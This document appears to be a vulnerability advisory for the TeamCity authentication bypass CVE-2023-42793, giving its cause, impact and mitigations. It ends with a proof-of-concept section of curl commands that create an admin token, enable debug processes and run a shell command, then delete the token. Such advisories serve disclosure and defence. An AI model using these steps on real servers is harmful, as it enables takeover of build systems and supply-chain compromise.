Vulnerable Version
version 2023.05.3 and below
Fixed Version
update latest version
Base Score
9.8 Critical
Vendor Description:-
JetBrains TeamCity is a robust continuous integration and continuous deployment (CI/CD) server that helps developers and DevOps teams automate software development, testing, and delivery. It improves the development lifecycle by conducting builds, tests, and deploying apps in an efficient and repeatable manner. TeamCity connects with a wide range of tools and technologies, including version control systems like Git, issue trackers, and cloud platforms, making it extremely adaptable. It offers a full build history, real-time monitoring, and customisable processes to boost collaboration and efficiency. Overall, TeamCity is frequently used to ensure shorter release cycles, higher software quality, and improved delivery pipelines.
CVE-2023-42793 Description:-
The JetBrains TeamCity CVE-2023-42793 vulnerability is an authentication bypass. The vulnerability is located in the “RequestInterceptors.java” file and is caused by the wildcard route “//RPC2″ in the “myPreHandlingDisabled” PathSet [3]. If an inbound HTTP request contains the wildcard route “//RPC2″, the TeamCity server does not execute authentication checks.
Adversaries utilize this vulnerability to obtain an access token by submitting an HTTP POST request to the endpoint “/app/rest/users/id:1/tokens/RPC2”. In this case, RPC2 is the adversary’s name for the requested token, and it allows opponents to acquire access to an authentication token with the rights of the user with ID 1, which is always created by the administrator during system installation.
Although JetBrains issued a patch for the vulnerability, this merely inhibits future exploits. If the network is infiltrated prior to patching, security teams should conduct threat hunting.
Impact:-
Here are some significant effects of CVE-2023-42793 on JetBrains TeamCity:
- Full Administrative Access – Because user ID 1 is always the default administrator account, attackers can leverage this weakness to generate an admin-level authentication token without logging in.
- Remote Code Execution (RCE) – With administrative credentials, adversaries can upload malicious build configurations or plugins, causing arbitrary instructions to be executed on the TeamCity server.
- Supply Chain Compromise – TeamCity is a CI/CD platform; once penetrated, attackers can insert backdoors into software builds, causing downstream supply chain assaults.
- Credential and data theft – Attackers can take stored credentials (API keys, secrets, tokens) and sensitive project data from TeamCity, allowing for further lateral movement.
Mitigations:-
The dangers associated with this susceptibility can be reduced or eliminated by:
- Update TeamCity to version 2023.05.4 or later.
- Evaluate JetBrains’ most recent security patch plugin.
- Use up-to-date IPS signatures to filter network traffic.
- Alternatively, consider taking the server down.
POC
The main problem with this is that no request that ends in /RPC2 would be authenticated.Send the following request to add a rest API token called RPC2 in order to take advantage of the vulnerability. Success to generate a rest API token. Then, enable the debug mode with the API token. After that Once debug mode is activated, you can run any command you want:
Step 1:-
curl -X POST "http://192.168.146.137:8111/app/rest/users/id:1/tokens/RPC2"
Step 2:-
curl -X POST "http://192.168.146.137:8111/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true" -H "Authorization: Bearer "
Step 3:-
curl -X POST "http://192.168.146.137:8111/app/rest/debug/processes?exePath=id" -H "Authorization: Bearer "
It’s best to erase the API token that we added previously:
Step 4:- Delete token
DELETE /app/rest/users/id:1/tokens/RPC2
